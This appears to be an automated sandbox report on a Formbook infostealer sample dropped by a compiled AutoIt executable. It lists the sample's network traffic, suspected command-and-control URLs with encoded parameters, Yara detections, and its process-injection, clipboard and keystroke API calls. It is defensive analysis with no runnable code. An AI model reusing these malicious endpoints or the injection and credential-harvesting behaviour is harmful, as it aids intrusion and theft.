74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 23 May 2024 13:22:43 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:22:49 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:22:51 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:22:54 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: cipher.exe, 00000004.00000002.4527269915.0000000006E8A000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000432A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N
            Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: cipher.exe, 00000004.00000002.4527269915.0000000006B66000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000004006000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMY
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.isrninjas.com
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.isrninjas.com/klk7/
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cipher.exe, 00000004.00000002.4527269915.000000000651E000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cipher.exe, 00000004.00000003.2413338446.00000000082BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Q
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cipher.exe, 00000004.00000002.4527269915.00000000069D4000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003E74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: cipher.exe, 00000004.00000002.4527269915.000000000638C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000382C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.featurasandals.com/tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi
            Source: cipher.exe, 00000004.00000002.4527269915.0000000007340000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000047E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/renew?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tools?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tos?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/transfer_in?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/hover_domains
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00F7425A
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F74458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F74458
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F60219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F60219
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F8CDAC

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00F03B4C
            Source: PI No 20000814C.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_01cdad44-7
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1cf8f811-4
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F03633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00F03633
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F8C27C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C220 NtdllDialogWndProc_W,0_2_00F8C220
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F8C49C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F8C788
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F8C8EE
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F8C86D
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CBF9 NtdllDialogWndProc_W,0_2_00F8CBF9
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CBAE NtdllDialogWndProc_W,0_2_00F8CBAE
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CB7F NtdllDialogWndProc_W,0_2_00F8CB7F
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CB50 NtdllDialogWndProc_W,0_2_00F8CB50
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F8CC2E
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F8CDAC
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F8CD6C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F01290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00F01290
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F01287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W,0_2_00F01287
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F016DE GetParent,NtdllDialogWndProc_W,0_2_00F016DE
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8D6C6 NtdllDialogWndProc_W,0_2_00F8D6C6
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F016B5 NtdllDialogWndProc_W,0_2_00F016B5
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F0167D NtdllDialogWndProc_W,0_2_00F0167D
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F8D74C
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F0189B NtdllDialogWndProc_W,0_2_00F0189B
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8DA9A NtdllDialogWndProc_W,0_2_00F8DA9A
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F8BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F8BF4D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0049AF03 NtClose,2_2_0049AF03
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C70 NtFreeVirtualMemory,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A4650 NtSuspendThread,LdrInitializeThunk,4_2_053A4650
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A4340 NtSetContextThread,LdrInitializeThunk,4_2_053A4340
            Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_053A2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_053A2D30
